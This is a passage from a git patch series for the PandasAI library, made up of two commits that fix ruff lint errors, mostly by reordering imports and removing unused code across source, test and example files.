className={`!z-5 relative flex flex-col rounded-[20px] shadow-[rgba(0, 0, 0, 0.2)] shadow-md border border-gray-100 dark:border-none dark:shadow-none bg-clip-border dark:!bg-darkMain dark:text-white ${extra}`}
{...rest}
>
- {children} {/* Removed unnecessary fragment */}
+ {children}
);
}
From dd61ab8ae81d9f6f1ffab89c3561a88d9a655d2b Mon Sep 17 00:00:00 2001
From: ArslanSaleem
Date: Wed, 8 Jan 2025 13:43:28 +0100
Subject: [PATCH 26/58] fix: ruff errors
---
examples/from_yahoo_finance.py | 4 +++-
pandasai/__init__.py | 9 +++++----
pandasai/agent/base.py | 16 +++++++---------
pandasai/agent/state.py | 7 +++----
pandasai/config.py | 11 +++++------
pandasai/core/code_execution/code_executor.py | 6 +++---
pandasai/core/code_execution/environment.py | 5 +++--
pandasai/core/code_generation/__init__.py | 2 +-
pandasai/core/code_generation/base.py | 1 +
pandasai/core/code_generation/code_cleaning.py | 2 +-
pandasai/core/code_generation/code_security.py | 2 ++
pandasai/core/prompts/__init__.py | 5 ++++-
pandasai/core/prompts/base.py | 2 +-
pandasai/core/response/base.py | 5 ++++-
pandasai/core/user_query.py | 1 +
pandasai/data_loader/loader.py | 14 ++++++++------
pandasai/data_loader/query_builder.py | 2 +-
pandasai/dataframe/__init__.py | 1 -
pandasai/dataframe/base.py | 15 +++++++--------
pandasai/dataframe/query_builder.py | 2 +-
pandasai/dataframe/virtual_dataframe.py | 3 +++
pandasai/helpers/data_sampler.py | 1 -
pandasai/helpers/from_google_sheets.py | 3 +--
pandasai/helpers/logger.py | 3 ++-
pandasai/helpers/output_validator.py | 2 +-
pandasai/helpers/request.py | 2 +-
pandasai/llm/bamboo_llm.py | 2 +-
pandasai/smart_dataframe/__init__.py | 7 +++++--
pandasai/smart_datalake/__init__.py | 7 +++++--
tests/unit_tests/agent/test_agent.py | 4 ++--
.../safe_libs/test_base_restricted_module.py | 1 +
.../core/code_execution/test_code_execution.py | 5 +++--
.../core/code_execution/test_environment.py | 5 +++--
.../core/code_generation/test_code_cleaning.py | 7 ++++---
.../core/code_generation/test_code_security.py | 3 ++-
.../core/code_generation/test_code_validation.py | 4 ++--
tests/unit_tests/core/prompts/test_prompts.py | 3 ++-
tests/unit_tests/dataframe/test_dataframe.py | 10 ++++++----
tests/unit_tests/dataframe/test_loader.py | 10 ++++++----
tests/unit_tests/dataframe/test_query_builder.py | 1 +
tests/unit_tests/helpers/test_file_importer.py | 2 +-
tests/unit_tests/helpers/test_responses.py | 6 ++++--
tests/unit_tests/llms/test_bamboo_llm.py | 2 +-
.../prompts/test_correct_error_prompt.py | 2 +-
.../prompts/test_generate_python_code_prompt.py | 2 +-
tests/unit_tests/prompts/test_sql_prompt.py | 5 ++---
tests/unit_tests/test_file_importer.py | 2 +-
tests/unit_tests/test_pandasai_init.py | 7 ++++---
48 files changed, 127 insertions(+), 96 deletions(-)
diff --git a/examples/from_yahoo_finance.py b/examples/from_yahoo_finance.py
index b0e6c2590..5e27d5b9e 100644
--- a/examples/from_yahoo_finance.py
+++ b/examples/from_yahoo_finance.py
@@ -1,7 +1,9 @@
import os
+from extensions.connectors.yfinance.pandasai_yfinance.yahoo_finance import (
+ YahooFinanceConnector,
+)
from pandasai import Agent
-from extensions.connectors.yfinance.pandasai_yfinance.yahoo_finance import YahooFinanceConnector
yahoo_connector = YahooFinanceConnector("MSFT")
diff --git a/pandasai/__init__.py b/pandasai/__init__.py
index c7cb826a2..5703e2cad 100644
--- a/pandasai/__init__.py
+++ b/pandasai/__init__.py
@@ -3,21 +3,22 @@
PandasAI is a wrapper around a LLM to make dataframes conversational
"""
-from io import BytesIO
import os
+from io import BytesIO
from typing import List
from zipfile import ZipFile
import pandas as pd
-from pandasai.config import ConfigManager, APIKeyManager
+from pandasai.config import APIKeyManager, ConfigManager
from pandasai.exceptions import DatasetNotFound, PandasAIApiKeyError
from pandasai.helpers.path import find_project_root
from pandasai.helpers.request import get_pandaai_session
+
from .agent import Agent
-from .helpers.cache import Cache
-from .dataframe.base import DataFrame
from .data_loader.loader import DatasetLoader
+from .dataframe.base import DataFrame
+from .helpers.cache import Cache
from .smart_dataframe import SmartDataframe
from .smart_datalake import SmartDatalake
diff --git a/pandasai/agent/base.py b/pandasai/agent/base.py
index f7b9c7b56..30f802fe0 100644
--- a/pandasai/agent/base.py
+++ b/pandasai/agent/base.py
@@ -1,5 +1,7 @@
import traceback
import uuid
+import warnings
+from importlib.util import find_spec
from typing import Any, List, Optional, Tuple, Union
from pandasai.core.cache import Cache
@@ -12,31 +14,27 @@
get_correct_error_prompt_for_sql,
get_correct_output_type_error_prompt,
)
+from pandasai.core.prompts.base import BasePrompt
from pandasai.core.response.base import ResponseParser
from pandasai.core.user_query import UserQuery
+from pandasai.data_loader.schema_validator import is_schema_source_same
from pandasai.dataframe.base import DataFrame
from pandasai.dataframe.virtual_dataframe import VirtualDataFrame
-
-from .state import AgentState
-from pandasai.core.prompts.base import BasePrompt
-from pandasai.data_loader.schema_validator import is_schema_source_same
from pandasai.llm.bamboo_llm import BambooLLM
from pandasai.vectorstores.vectorstore import VectorStore
-from ..config import load_config_from_json
+from ..config import Config, load_config_from_json
from ..constants import DEFAULT_CACHE_DIRECTORY, DEFAULT_CHART_DIRECTORY
from ..exceptions import (
- InvalidLLMOutputType,
InvalidConfigError,
+ InvalidLLMOutputType,
MissingVectorStoreError,
)
from ..helpers.folder import Folder
from ..helpers.logger import Logger
from ..helpers.memory import Memory
from ..llm.base import LLM
-from importlib.util import find_spec
-from ..config import Config
-import warnings
+from .state import AgentState
class Agent:
diff --git a/pandasai/agent/state.py b/pandasai/agent/state.py
index 693832103..ca826b7cb 100644
--- a/pandasai/agent/state.py
+++ b/pandasai/agent/state.py
@@ -1,17 +1,16 @@
from __future__ import annotations
+
from dataclasses import dataclass, field
from typing import TYPE_CHECKING, Any, Dict, List, Optional, Union
+from pandasai.config import Config
from pandasai.helpers.cache import Cache
from pandasai.helpers.logger import Logger
from pandasai.helpers.memory import Memory
-
-from pandasai.config import Config
from pandasai.vectorstores.vectorstore import VectorStore
if TYPE_CHECKING:
- from pandasai.dataframe import DataFrame
- from pandasai.dataframe import VirtualDataFrame
+ from pandasai.dataframe import DataFrame, VirtualDataFrame
@dataclass
diff --git a/pandasai/config.py b/pandasai/config.py
index 66af9637c..fde784d32 100644
--- a/pandasai/config.py
+++ b/pandasai/config.py
@@ -1,17 +1,16 @@
-from importlib.util import find_spec
import json
import os
+from importlib.util import find_spec
+from typing import Any, Dict, List, Literal, Optional, Union
+
+from pydantic import BaseModel, ConfigDict, Field
import pandasai.llm as llm
+from pandasai.constants import DEFAULT_CHART_DIRECTORY
from pandasai.llm.base import LLM
from .helpers.path import find_closest
-from typing import Any, List, Optional, Dict, Union, Literal
-from pydantic import BaseModel, Field, ConfigDict
-
-from pandasai.constants import DEFAULT_CHART_DIRECTORY
-
class Config(BaseModel):
save_logs: bool = True
diff --git a/pandasai/core/code_execution/code_executor.py b/pandasai/core/code_execution/code_executor.py
index 91aa13816..0e62124c2 100644
--- a/pandasai/core/code_execution/code_executor.py
+++ b/pandasai/core/code_execution/code_executor.py
@@ -1,10 +1,10 @@
import ast
-from pandasai.core.code_execution.environment import get_environment
+from typing import Any, List
+
from pandasai.config import Config
+from pandasai.core.code_execution.environment import get_environment
from pandasai.exceptions import NoResultFoundError
-from typing import Any, List
-
class CodeExecutor:
"""
diff --git a/pandasai/core/code_execution/environment.py b/pandasai/core/code_execution/environment.py
index ff2bef1d9..b42244823 100644
--- a/pandasai/core/code_execution/environment.py
+++ b/pandasai/core/code_execution/environment.py
@@ -5,11 +5,14 @@
import importlib
import sys
+import types
import warnings
from typing import List, Union
from pandas.util.version import Version
+from pandasai.constants import WHITELISTED_BUILTINS
+
from .safe_libs.restricted_base64 import RestrictedBase64
from .safe_libs.restricted_datetime import (
RestrictedDatetime,
@@ -20,8 +23,6 @@
)
from .safe_libs.restricted_numpy import RestrictedNumpy
from .safe_libs.restricted_pandas import RestrictedPandas
-from pandasai.constants import WHITELISTED_BUILTINS
-import types
# Minimum version required for each optional dependency
diff --git a/pandasai/core/code_generation/__init__.py b/pandasai/core/code_generation/__init__.py
index 8c62e09ca..2cc0b320b 100644
--- a/pandasai/core/code_generation/__init__.py
+++ b/pandasai/core/code_generation/__init__.py
@@ -1,5 +1,5 @@
-from .code_cleaning import CodeCleaner
from .base import CodeGenerator
+from .code_cleaning import CodeCleaner
from .code_security import CodeSecurityChecker
from .code_validation import CodeRequirementValidator
diff --git a/pandasai/core/code_generation/base.py b/pandasai/core/code_generation/base.py
index 498acec5a..f6561abbc 100644
--- a/pandasai/core/code_generation/base.py
+++ b/pandasai/core/code_generation/base.py
@@ -2,6 +2,7 @@
from pandasai.agent.state import AgentState
from pandasai.core.prompts.base import BasePrompt
+
from .code_cleaning import CodeCleaner
from .code_security import CodeSecurityChecker
from .code_validation import CodeRequirementValidator
diff --git a/pandasai/core/code_generation/code_cleaning.py b/pandasai/core/code_generation/code_cleaning.py
index 7d288d6c1..b2555b6cb 100644
--- a/pandasai/core/code_generation/code_cleaning.py
+++ b/pandasai/core/code_generation/code_cleaning.py
@@ -4,8 +4,8 @@
from typing import Union
import astor
-from pandasai.agent.state import AgentState
+from pandasai.agent.state import AgentState
from pandasai.core.code_execution.code_executor import CodeExecutor
from pandasai.helpers.path import find_project_root
from pandasai.helpers.sql import extract_table_names
diff --git a/pandasai/core/code_generation/code_security.py b/pandasai/core/code_generation/code_security.py
index 09860eaa0..9202b40fb 100644
--- a/pandasai/core/code_generation/code_security.py
+++ b/pandasai/core/code_generation/code_security.py
@@ -1,6 +1,8 @@
import ast
import re
+
import astor
+
from pandasai.agent.state import AgentState
from pandasai.constants import RESTRICTED_LIBS
from pandasai.exceptions import MaliciousCodeGenerated
diff --git a/pandasai/core/prompts/__init__.py b/pandasai/core/prompts/__init__.py
index 9fcb903a0..27f00f60d 100644
--- a/pandasai/core/prompts/__init__.py
+++ b/pandasai/core/prompts/__init__.py
@@ -1,15 +1,18 @@
from __future__ import annotations
+
from typing import TYPE_CHECKING
+
from pandasai.core.prompts.correct_execute_sql_query_usage_error_prompt import (
CorrectExecuteSQLQueryUsageErrorPrompt,
)
from pandasai.core.prompts.correct_output_type_error_prompt import (
CorrectOutputTypeErrorPrompt,
)
-from .generate_python_code_with_sql import GeneratePythonCodeWithSQLPrompt
+
from .base import BasePrompt
from .correct_error_prompt import CorrectErrorPrompt
from .generate_python_code import GeneratePythonCodePrompt
+from .generate_python_code_with_sql import GeneratePythonCodeWithSQLPrompt
if TYPE_CHECKING:
from pandasai.agent.state import AgentState
diff --git a/pandasai/core/prompts/base.py b/pandasai/core/prompts/base.py
index b2c43bcb2..d49f7d6ca 100644
--- a/pandasai/core/prompts/base.py
+++ b/pandasai/core/prompts/base.py
@@ -4,11 +4,11 @@
import os
import re
+from abc import ABC, abstractmethod
from pathlib import Path
from typing import Optional
from jinja2 import Environment, FileSystemLoader
-from abc import ABC, abstractmethod
class BasePrompt:
diff --git a/pandasai/core/response/base.py b/pandasai/core/response/base.py
index d6232019c..64ff402ac 100644
--- a/pandasai/core/response/base.py
+++ b/pandasai/core/response/base.py
@@ -1,9 +1,12 @@
import re
+
import numpy as np
import pandas as pd
-from .response_types import Chart, DataFrame, Number, String
+
from pandasai.exceptions import InvalidOutputValueMismatch
+from .response_types import Chart, DataFrame, Number, String
+
class ResponseParser:
def parse(self, result: dict):
diff --git a/pandasai/core/user_query.py b/pandasai/core/user_query.py
index 2dcf3979e..6a96b41dd 100644
--- a/pandasai/core/user_query.py
+++ b/pandasai/core/user_query.py
@@ -1,4 +1,5 @@
import re
+
from pandasai.exceptions import MaliciousQueryError
diff --git a/pandasai/data_loader/loader.py b/pandasai/data_loader/loader.py
index 39734486e..bcc63cb41 100644
--- a/pandasai/data_loader/loader.py
+++ b/pandasai/data_loader/loader.py
@@ -1,18 +1,20 @@
import copy
+import hashlib
+import importlib
import os
-import yaml
-import pandas as pd
from datetime import datetime, timedelta
-import hashlib
+from typing import Any
+
+import pandas as pd
+import yaml
from pandasai.dataframe.base import DataFrame
from pandasai.dataframe.virtual_dataframe import VirtualDataFrame
from pandasai.exceptions import InvalidDataSourceType
from pandasai.helpers.path import find_project_root
-import importlib
-from typing import Any
-from .query_builder import QueryBuilder
+
from ..constants import SUPPORTED_SOURCES
+from .query_builder import QueryBuilder
class DatasetLoader:
diff --git a/pandasai/data_loader/query_builder.py b/pandasai/data_loader/query_builder.py
index 317bd7aeb..188353067 100644
--- a/pandasai/data_loader/query_builder.py
+++ b/pandasai/data_loader/query_builder.py
@@ -1,4 +1,4 @@
-from typing import Dict, Any, List, Union
+from typing import Any, Dict, List, Union
class QueryBuilder:
diff --git a/pandasai/dataframe/__init__.py b/pandasai/dataframe/__init__.py
index 3fb3e08ef..eb6993036 100644
--- a/pandasai/dataframe/__init__.py
+++ b/pandasai/dataframe/__init__.py
@@ -1,5 +1,4 @@
from .base import DataFrame
from .virtual_dataframe import VirtualDataFrame
-
__all__ = ["DataFrame", "VirtualDataFrame"]
diff --git a/pandasai/dataframe/base.py b/pandasai/dataframe/base.py
index c2ecd980b..3d73d7c14 100644
--- a/pandasai/dataframe/base.py
+++ b/pandasai/dataframe/base.py
@@ -1,16 +1,17 @@
from __future__ import annotations
-from io import BytesIO
+
+import hashlib
import os
import re
+from io import BytesIO
+from typing import TYPE_CHECKING, ClassVar, Dict, List, Optional, Union
from zipfile import ZipFile
-import pandas as pd
-from typing import TYPE_CHECKING, List, Optional, Union, Dict, ClassVar
+import pandas as pd
import yaml
-
+import pandasai as pai
from pandasai.config import Config
-import hashlib
from pandasai.exceptions import DatasetNotFound, PandasAIApiKeyError
from pandasai.helpers.dataframe_serializer import (
DataframeSerializer,
@@ -18,8 +19,6 @@
)
from pandasai.helpers.path import find_project_root
from pandasai.helpers.request import get_pandaai_session
-import pandasai as pai
-
if TYPE_CHECKING:
from pandasai.agent.base import Agent
@@ -102,7 +101,7 @@ def chat(self, prompt: str, config: Optional[Union[dict, Config]] = None) -> str
if self._agent is None:
from pandasai.agent import (
Agent,
- ) # Import here to avoid circular import
+ )
self._agent = Agent([self], config=self.config)
diff --git a/pandasai/dataframe/query_builder.py b/pandasai/dataframe/query_builder.py
index 8bc8c1e50..dfb0bb615 100644
--- a/pandasai/dataframe/query_builder.py
+++ b/pandasai/dataframe/query_builder.py
@@ -1,4 +1,4 @@
-from typing import Dict, Any, List, Union
+from typing import Any, Dict, List, Union
class QueryBuilder:
diff --git a/pandasai/dataframe/virtual_dataframe.py b/pandasai/dataframe/virtual_dataframe.py
index 84b40df4d..1476290e1 100644
--- a/pandasai/dataframe/virtual_dataframe.py
+++ b/pandasai/dataframe/virtual_dataframe.py
@@ -1,6 +1,9 @@
from __future__ import annotations
+
from typing import TYPE_CHECKING, ClassVar
+
import pandas as pd
+
from pandasai.dataframe.base import DataFrame
if TYPE_CHECKING:
diff --git a/pandasai/helpers/data_sampler.py b/pandasai/helpers/data_sampler.py
index 02fca788a..f8f7a956c 100644
--- a/pandasai/helpers/data_sampler.py
+++ b/pandasai/helpers/data_sampler.py
@@ -10,7 +10,6 @@
import random
import numpy as np
-
import pandas as pd
from .anonymizer import Anonymizer
diff --git a/pandasai/helpers/from_google_sheets.py b/pandasai/helpers/from_google_sheets.py
index caab43a7f..f702347af 100644
--- a/pandasai/helpers/from_google_sheets.py
+++ b/pandasai/helpers/from_google_sheets.py
@@ -1,8 +1,7 @@
import re
-import requests
-
import pandas as pd
+import requests
def get_google_sheet(src) -> list:
diff --git a/pandasai/helpers/logger.py b/pandasai/helpers/logger.py
index d234eb72c..b5f2893dc 100644
--- a/pandasai/helpers/logger.py
+++ b/pandasai/helpers/logger.py
@@ -22,9 +22,10 @@
import time
from typing import List
-from pandasai.helpers.telemetry import scarf_analytics
from pydantic import BaseModel
+from pandasai.helpers.telemetry import scarf_analytics
+
from .path import find_closest
diff --git a/pandasai/helpers/output_validator.py b/pandasai/helpers/output_validator.py
index 98a7309f2..05e8e0d9e 100644
--- a/pandasai/helpers/output_validator.py
+++ b/pandasai/helpers/output_validator.py
@@ -2,8 +2,8 @@
from typing import Any, Iterable
import numpy as np
-
import pandas as pd
+
from pandasai.exceptions import InvalidOutputValueMismatch
diff --git a/pandasai/helpers/request.py b/pandasai/helpers/request.py
index a16ea266c..66b17e293 100644
--- a/pandasai/helpers/request.py
+++ b/pandasai/helpers/request.py
@@ -5,10 +5,10 @@
from urllib.parse import urljoin
import requests
+from dotenv import load_dotenv
from pandasai.exceptions import PandasAIApiCallError, PandasAIApiKeyError
from pandasai.helpers.logger import Logger
-from dotenv import load_dotenv
load_dotenv()
diff --git a/pandasai/llm/bamboo_llm.py b/pandasai/llm/bamboo_llm.py
index 0484141e5..a867c54dc 100644
--- a/pandasai/llm/bamboo_llm.py
+++ b/pandasai/llm/bamboo_llm.py
@@ -1,6 +1,6 @@
from __future__ import annotations
-from typing import TYPE_CHECKING, Optional
+from typing import TYPE_CHECKING, Optional
if TYPE_CHECKING:
from pandasai.core.prompts.base import BasePrompt
diff --git a/pandasai/smart_dataframe/__init__.py b/pandasai/smart_dataframe/__init__.py
index 046608616..80a68bfb3 100644
--- a/pandasai/smart_dataframe/__init__.py
+++ b/pandasai/smart_dataframe/__init__.py
@@ -1,13 +1,16 @@
import uuid
+import warnings
from functools import cached_property
from io import StringIO
from typing import Any, List, Optional, Union
-import warnings
+
import pandas as pd
+
from pandasai.agent import Agent
from pandasai.dataframe.base import DataFrame
-from ..helpers.logger import Logger
+
from ..config import Config
+from ..helpers.logger import Logger
class SmartDataframe:
diff --git a/pandasai/smart_datalake/__init__.py b/pandasai/smart_datalake/__init__.py
index 1d1a90937..aae12092e 100644
--- a/pandasai/smart_datalake/__init__.py
+++ b/pandasai/smart_datalake/__init__.py
@@ -1,11 +1,14 @@
import uuid
import warnings
-import pandas as pd
from typing import List, Optional, Union
+
+import pandas as pd
+
from pandasai.agent import Agent
from pandasai.dataframe.base import DataFrame
-from ..helpers.cache import Cache
+
from ..config import Config
+from ..helpers.cache import Cache
class SmartDatalake:
diff --git a/tests/unit_tests/agent/test_agent.py b/tests/unit_tests/agent/test_agent.py
index 632a68e5f..8223c8ca7 100644
--- a/tests/unit_tests/agent/test_agent.py
+++ b/tests/unit_tests/agent/test_agent.py
@@ -7,10 +7,10 @@
from pandasai.agent.base import Agent
from pandasai.core.prompts.base import BasePrompt
-from pandasai.llm.fake import FakeLLM
-from pandasai.helpers.dataframe_serializer import DataframeSerializerType
from pandasai.dataframe.base import DataFrame
from pandasai.exceptions import MaliciousQueryError
+from pandasai.helpers.dataframe_serializer import DataframeSerializerType
+from pandasai.llm.fake import FakeLLM
class TestAgent:
diff --git a/tests/unit_tests/core/code_execution/safe_libs/test_base_restricted_module.py b/tests/unit_tests/core/code_execution/safe_libs/test_base_restricted_module.py
index 9c945b983..6d191f22f 100644
--- a/tests/unit_tests/core/code_execution/safe_libs/test_base_restricted_module.py
+++ b/tests/unit_tests/core/code_execution/safe_libs/test_base_restricted_module.py
@@ -1,4 +1,5 @@
import unittest
+
from pandasai.core.code_execution.safe_libs.base_restricted_module import (
BaseRestrictedModule,
SecurityError,
diff --git a/tests/unit_tests/core/code_execution/test_code_execution.py b/tests/unit_tests/core/code_execution/test_code_execution.py
index 2981795df..9628aae86 100644
--- a/tests/unit_tests/core/code_execution/test_code_execution.py
+++ b/tests/unit_tests/core/code_execution/test_code_execution.py
@@ -1,8 +1,9 @@
+import ast
import unittest
from unittest.mock import MagicMock
-import ast
-from pandasai.core.code_execution.code_executor import CodeExecutor
+
from pandasai.config import Config
+from pandasai.core.code_execution.code_executor import CodeExecutor
from pandasai.exceptions import NoResultFoundError
diff --git a/tests/unit_tests/core/code_execution/test_environment.py b/tests/unit_tests/core/code_execution/test_environment.py
index 6d4624f90..b16b6b353 100644
--- a/tests/unit_tests/core/code_execution/test_environment.py
+++ b/tests/unit_tests/core/code_execution/test_environment.py
@@ -1,9 +1,10 @@
import unittest
-from unittest.mock import patch, MagicMock
+from unittest.mock import MagicMock, patch
+
from pandasai.core.code_execution.environment import (
get_environment,
- import_dependency,
get_version,
+ import_dependency,
)
from pandasai.core.code_execution.safe_libs.restricted_pandas import RestrictedPandas
diff --git a/tests/unit_tests/core/code_generation/test_code_cleaning.py b/tests/unit_tests/core/code_generation/test_code_cleaning.py
index 0bb433d03..d324ce777 100644
--- a/tests/unit_tests/core/code_generation/test_code_cleaning.py
+++ b/tests/unit_tests/core/code_generation/test_code_cleaning.py
@@ -1,10 +1,11 @@
+import ast
import unittest
from unittest.mock import MagicMock
-import ast
-from pandasai.core.code_generation.code_cleaning import CodeCleaner
+
from pandasai.agent.state import AgentState
-from pandasai.exceptions import BadImportError, MaliciousQueryError
+from pandasai.core.code_generation.code_cleaning import CodeCleaner
from pandasai.dataframe.base import DataFrame
+from pandasai.exceptions import BadImportError, MaliciousQueryError
class TestCodeCleaner(unittest.TestCase):
diff --git a/tests/unit_tests/core/code_generation/test_code_security.py b/tests/unit_tests/core/code_generation/test_code_security.py
index a34c56477..9f362975c 100644
--- a/tests/unit_tests/core/code_generation/test_code_security.py
+++ b/tests/unit_tests/core/code_generation/test_code_security.py
@@ -1,7 +1,8 @@
import unittest
from unittest.mock import MagicMock
-from pandasai.core.code_generation.code_security import CodeSecurityChecker
+
from pandasai.agent.state import AgentState
+from pandasai.core.code_generation.code_security import CodeSecurityChecker
from pandasai.exceptions import MaliciousCodeGenerated
diff --git a/tests/unit_tests/core/code_generation/test_code_validation.py b/tests/unit_tests/core/code_generation/test_code_validation.py
index 469efd695..1ba164542 100644
--- a/tests/unit_tests/core/code_generation/test_code_validation.py
+++ b/tests/unit_tests/core/code_generation/test_code_validation.py
@@ -1,8 +1,8 @@
import unittest
from unittest.mock import MagicMock
-import ast
-from pandasai.core.code_generation.code_validation import CodeRequirementValidator
+
from pandasai.agent.state import AgentState
+from pandasai.core.code_generation.code_validation import CodeRequirementValidator
from pandasai.exceptions import ExecuteSQLQueryNotUsed
diff --git a/tests/unit_tests/core/prompts/test_prompts.py b/tests/unit_tests/core/prompts/test_prompts.py
index 2ad31d953..e3497cd65 100644
--- a/tests/unit_tests/core/prompts/test_prompts.py
+++ b/tests/unit_tests/core/prompts/test_prompts.py
@@ -1,5 +1,7 @@
import unittest
from unittest.mock import MagicMock
+
+from pandasai.agent.state import AgentState
from pandasai.core.prompts import (
get_chat_prompt,
get_chat_prompt_for_sql,
@@ -7,7 +9,6 @@
get_correct_error_prompt_for_sql,
get_correct_output_type_error_prompt,
)
-from pandasai.agent.state import AgentState
from pandasai.core.prompts.base import BasePrompt
from pandasai.core.prompts.correct_error_prompt import CorrectErrorPrompt
from pandasai.core.prompts.correct_execute_sql_query_usage_error_prompt import (
diff --git a/tests/unit_tests/dataframe/test_dataframe.py b/tests/unit_tests/dataframe/test_dataframe.py
index 810d9b956..ff0e5f39f 100644
--- a/tests/unit_tests/dataframe/test_dataframe.py
+++ b/tests/unit_tests/dataframe/test_dataframe.py
@@ -1,9 +1,11 @@
-import pytest
-import pandas as pd
from unittest.mock import Mock, patch
-from pandasai.dataframe.base import DataFrame
-from pandasai.agent import Agent
+
+import pandas as pd
+import pytest
+
import pandasai
+from pandasai.agent import Agent
+from pandasai.dataframe.base import DataFrame
class TestDataFrame:
diff --git a/tests/unit_tests/dataframe/test_loader.py b/tests/unit_tests/dataframe/test_loader.py
index 4bb1b1591..c0165a720 100644
--- a/tests/unit_tests/dataframe/test_loader.py
+++ b/tests/unit_tests/dataframe/test_loader.py
@@ -1,9 +1,11 @@
-import pytest
-from unittest.mock import patch, mock_open
+from datetime import datetime, timedelta
+from unittest.mock import mock_open, patch
+
import pandas as pd
-from pandasai.dataframe.base import DataFrame
+import pytest
+
from pandasai.data_loader.loader import DatasetLoader
-from datetime import datetime, timedelta
+from pandasai.dataframe.base import DataFrame
class TestDatasetLoader:
diff --git a/tests/unit_tests/dataframe/test_query_builder.py b/tests/unit_tests/dataframe/test_query_builder.py
index 431d4a52a..9dc977b54 100644
--- a/tests/unit_tests/dataframe/test_query_builder.py
+++ b/tests/unit_tests/dataframe/test_query_builder.py
@@ -1,4 +1,5 @@
import pytest
+
from pandasai.data_loader.query_builder import QueryBuilder
diff --git a/tests/unit_tests/helpers/test_file_importer.py b/tests/unit_tests/helpers/test_file_importer.py
index be0c7357b..c5a59ba89 100644
--- a/tests/unit_tests/helpers/test_file_importer.py
+++ b/tests/unit_tests/helpers/test_file_importer.py
@@ -2,9 +2,9 @@
Unit tests for the FileImporter class
"""
+import pandas as pd
import pytest
-import pandas as pd
from pandasai.helpers.file_importer import FileImporter
diff --git a/tests/unit_tests/helpers/test_responses.py b/tests/unit_tests/helpers/test_responses.py
index bf4337421..8b9af48c9 100644
--- a/tests/unit_tests/helpers/test_responses.py
+++ b/tests/unit_tests/helpers/test_responses.py
@@ -1,8 +1,10 @@
import unittest
-from pandasai.exceptions import InvalidOutputValueMismatch
+
+import pandas as pd
+
from pandasai.core.response.base import ResponseParser
from pandasai.core.response.response_types import Chart, DataFrame, Number, String
-import pandas as pd
+from pandasai.exceptions import InvalidOutputValueMismatch
class TestResponseParser(unittest.TestCase):
diff --git a/tests/unit_tests/llms/test_bamboo_llm.py b/tests/unit_tests/llms/test_bamboo_llm.py
index 6feff2b9f..e721d8870 100644
--- a/tests/unit_tests/llms/test_bamboo_llm.py
+++ b/tests/unit_tests/llms/test_bamboo_llm.py
@@ -1,9 +1,9 @@
import unittest
from unittest.mock import MagicMock, patch
+from pandasai.core.prompts.base import BasePrompt
from pandasai.exceptions import PandasAIApiCallError
from pandasai.llm.bamboo_llm import BambooLLM
-from pandasai.core.prompts.base import BasePrompt
class MockHttpResponse:
diff --git a/tests/unit_tests/prompts/test_correct_error_prompt.py b/tests/unit_tests/prompts/test_correct_error_prompt.py
index 648f189a0..7ac72e520 100644
--- a/tests/unit_tests/prompts/test_correct_error_prompt.py
+++ b/tests/unit_tests/prompts/test_correct_error_prompt.py
@@ -3,10 +3,10 @@
import sys
from pandasai import Agent
+from pandasai.core.prompts.correct_error_prompt import CorrectErrorPrompt
from pandasai.dataframe.base import DataFrame
from pandasai.helpers.dataframe_serializer import DataframeSerializerType
from pandasai.llm.fake import FakeLLM
-from pandasai.core.prompts.correct_error_prompt import CorrectErrorPrompt
class TestCorrectErrorPrompt:
diff --git a/tests/unit_tests/prompts/test_generate_python_code_prompt.py b/tests/unit_tests/prompts/test_generate_python_code_prompt.py
index a1e630d5e..72e03b592 100644
--- a/tests/unit_tests/prompts/test_generate_python_code_prompt.py
+++ b/tests/unit_tests/prompts/test_generate_python_code_prompt.py
@@ -7,10 +7,10 @@
import pytest
from pandasai import Agent
+from pandasai.core.prompts.generate_python_code import GeneratePythonCodePrompt
from pandasai.dataframe.base import DataFrame
from pandasai.helpers.dataframe_serializer import DataframeSerializerType
from pandasai.llm.fake import FakeLLM
-from pandasai.core.prompts.generate_python_code import GeneratePythonCodePrompt
class TestGeneratePythonCodePrompt:
diff --git a/tests/unit_tests/prompts/test_sql_prompt.py b/tests/unit_tests/prompts/test_sql_prompt.py
index bceee84bc..2e184983c 100644
--- a/tests/unit_tests/prompts/test_sql_prompt.py
+++ b/tests/unit_tests/prompts/test_sql_prompt.py
@@ -3,15 +3,14 @@
import os
import sys
-import pandasai as pai
import pytest
+import pandasai as pai
from pandasai import Agent
-from pandasai.helpers.dataframe_serializer import DataframeSerializerType
-from pandasai.llm.fake import FakeLLM
from pandasai.core.prompts.generate_python_code_with_sql import (
GeneratePythonCodeWithSQLPrompt,
)
+from pandasai.llm.fake import FakeLLM
class TestGeneratePythonCodeWithSQLPrompt:
diff --git a/tests/unit_tests/test_file_importer.py b/tests/unit_tests/test_file_importer.py
index be0c7357b..c5a59ba89 100644
--- a/tests/unit_tests/test_file_importer.py
+++ b/tests/unit_tests/test_file_importer.py
@@ -2,9 +2,9 @@
Unit tests for the FileImporter class
"""
+import pandas as pd
import pytest
-import pandas as pd
from pandasai.helpers.file_importer import FileImporter
diff --git a/tests/unit_tests/test_pandasai_init.py b/tests/unit_tests/test_pandasai_init.py
index 472de1618..a69ebf052 100644
--- a/tests/unit_tests/test_pandasai_init.py
+++ b/tests/unit_tests/test_pandasai_init.py
@@ -1,6 +1,7 @@
-import pandas
+from unittest.mock import MagicMock, patch
+
import pytest
-from unittest.mock import patch, MagicMock
+
import pandasai
from pandasai.dataframe.base import DataFrame
from pandasai.exceptions import DatasetNotFound, PandasAIApiKeyError
@@ -99,7 +100,7 @@ def test_load_dataset_not_found(self, mockenviron, mock_bytes_io, mock_zip_file)
dataset_path = "org/dataset_name"
- with pytest.raises(DatasetNotFound) as cm:
+ with pytest.raises(DatasetNotFound):
pandasai.load(dataset_path)
@patch("pandasai.os.path.exists")
From 07ce3cc587ec04aba9c6eb4d112fdcf62f4fbc03 Mon Sep 17 00:00:00 2001
From: ArslanSaleem
Date: Wed, 8 Jan 2025 13:47:34 +0100
Subject: [PATCH 27/58] fix: ruff errors
---
examples/dataframe.py | 1 +
examples/judge_agent.py | 3 ++-
examples/security_agent.py | 3 ++-
examples/table_relations.py | 5 +++--
4 files changed, 8 insertions(+), 4 deletions(-)
diff --git a/examples/dataframe.py b/examples/dataframe.py
index a61f04dbe..9e404886c 100644
--- a/examples/dataframe.py
+++ b/examples/dataframe.py
@@ -1,4 +1,5 @@
import os
+
import pandasai as pai
# Create a sample pandas DataFrame
diff --git a/examples/judge_agent.py b/examples/judge_agent.py
index 1c4decaef..473a08834 100644
--- a/examples/judge_agent.py
+++ b/examples/judge_agent.py
@@ -1,8 +1,9 @@
import os
+from pandasai_openai import OpenAI
+
